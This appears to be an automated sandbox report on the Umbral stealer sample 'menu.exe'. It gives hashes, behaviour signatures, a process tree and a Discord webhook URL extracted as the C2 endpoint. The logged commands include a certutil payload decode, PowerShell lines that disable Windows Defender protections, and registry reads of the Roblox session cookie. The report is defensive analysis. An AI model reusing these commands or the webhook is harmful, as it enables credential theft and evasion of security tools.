Overview

overview

10

Static

static

3

menu.exe

windows7-x64

10

menu.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-02-2025 20:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    menu.exe

  • Size

    429KB

  • MD5

    d26a02891c33b040f2452d54f579ad48

  • SHA1

    31804768215d8c61ab46d146d47daf87bd67a748

  • SHA256

    1d27b8e069a17744560a4e66050ab43938b1b9b61770854c0becf7bbb39ba546

  • SHA512

    0373fc38527e78164937de7b957d8cb952b03a463c6c6445df294963d9949ac4002f947f0f9cb10d8c054825b1131c250ae7582c9be296afcf5e872eed29a417

  • SSDEEP

    6144:yBlkZvaF4NTBtcfBpUwnEPU8QJRtIHYqmuEU2Go56ACLSaC3mWN9Lg00oQBQDsLy:yoSWNT/m3vneuWHPc6ACmJmKJ0oQWgUr

Score
10/10
umbraldefense_evasiondiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1337245285906124970/bZ3_ZvAOrPXKKkOLcSzaJTktgaHlH_MDlk4vp0EAIhEj0fgz1GQSR4nw4WAiOieBnrr-

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Payload decoded via CertUtil.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\menu.exe
    "C:\Users\Admin\AppData\Local\Temp\menu.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C909.tmp\C90A.tmp\C90B.bat C:\Users\Admin\AppData\Local\Temp\menu.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\system32\certutil.exe
        certutil -decode "C:\Users\Admin\AppData\Local\Temp\embedded.b64" "C:\Users\Admin\AppData\Local\Temp\embedded.exe"
        3⤵
        • Deobfuscate/Decode Files or Information
        PID:264
      • C:\Users\Admin\AppData\Local\Temp\embedded.exe
        "C:\Users\Admin\AppData\Local\Temp\embedded.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\embedded.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2940
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1196
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2840
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1260
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
            PID:408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2080
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:2320

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\C909.tmp\C90A.tmp\C90B.bat
      Filesize

      340KB

      MD5

      7ea8a4af7da6d665fd522b3e7b984dfd

      SHA1

      f423bddceac525aa1b6ed85990159621294ecbe4

      SHA256

      7f3c3a67e583cdfa80dd5028c6cd411f409d68d8475adc8413478bd9985fab91

      SHA512

      d26e6f1e9b4d23c01e3d22f623dac5574f1c701e5e3195010cba076aecada072e5ca9f88584218aaaac5f8f16238c4b5c0258a34837bbacbe57411fa0fd67f6e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\embedded.b64
      Filesize

      312KB

      MD5

      f2bf8991b132ba68ab1ef66511589256

      SHA1

      73c02b189629d2bb34b3c1a19b1e4187d08fea78

      SHA256

      8f23b22c8983803af707cded52c8cbc48c2b48219a59f5669ddb1e21c665dbd9

      SHA512

      3e5ac527ef4863d1c7275b6673c26c59364966b9dd534265844b2794515e0a34f8db7851f3146b4c5337327b1244584bcfdc4c7af51291ce22d5b1a1141dc666

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\embedded.exe
      Filesize

      229KB

      MD5

      a3e9f416fa72d1dbd6d3927815899474

      SHA1

      0fc85c7dc7d5174c3d4e3beeaaaabfe10aa1cb6e

      SHA256

      c71e662398dddc8f743382970001c64786af9b5da038fa1df2a0b2bffb0294b0

      SHA512

      d53163d833db1edc0fc3be5f5ec9f4f83fb96b012c79a0c64171d5ec8c15d63bb7235fa57a0ecef4cb423abcc4f3b9f6cd36121cae71661aae7ce0b0a2907c28

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      57e7a1a7c57ae85d6a9df9b0a18ccf83

      SHA1

      87d6124ef89138570434623fd1256be37ccb36aa

      SHA256

      7076fc97b8c48c3191d937ebe6c168fb47481afbe65d68f28b595f50737779c0

      SHA512

      446cae60db0a403476044a0dcb473684ef8d9705f5eba490d18cfdcaa2f7f18b55747bcdfda7ade2afcab609557a41c3bd4573e2a54db04be1d17eb12886dde1

      Download Submit

    • memory/268-25-0x0000000002A60000-0x0000000002A68000-memory.dmp

      Filesize

      32KB

      Download

    • memory/268-24-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2428-11-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2428-12-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2428-10-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2428-9-0x0000000000D10000-0x0000000000D50000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2428-8-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2428-55-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2940-17-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2940-18-0x0000000002310000-0x0000000002318000-memory.dmp

      Filesize

      32KB

      Download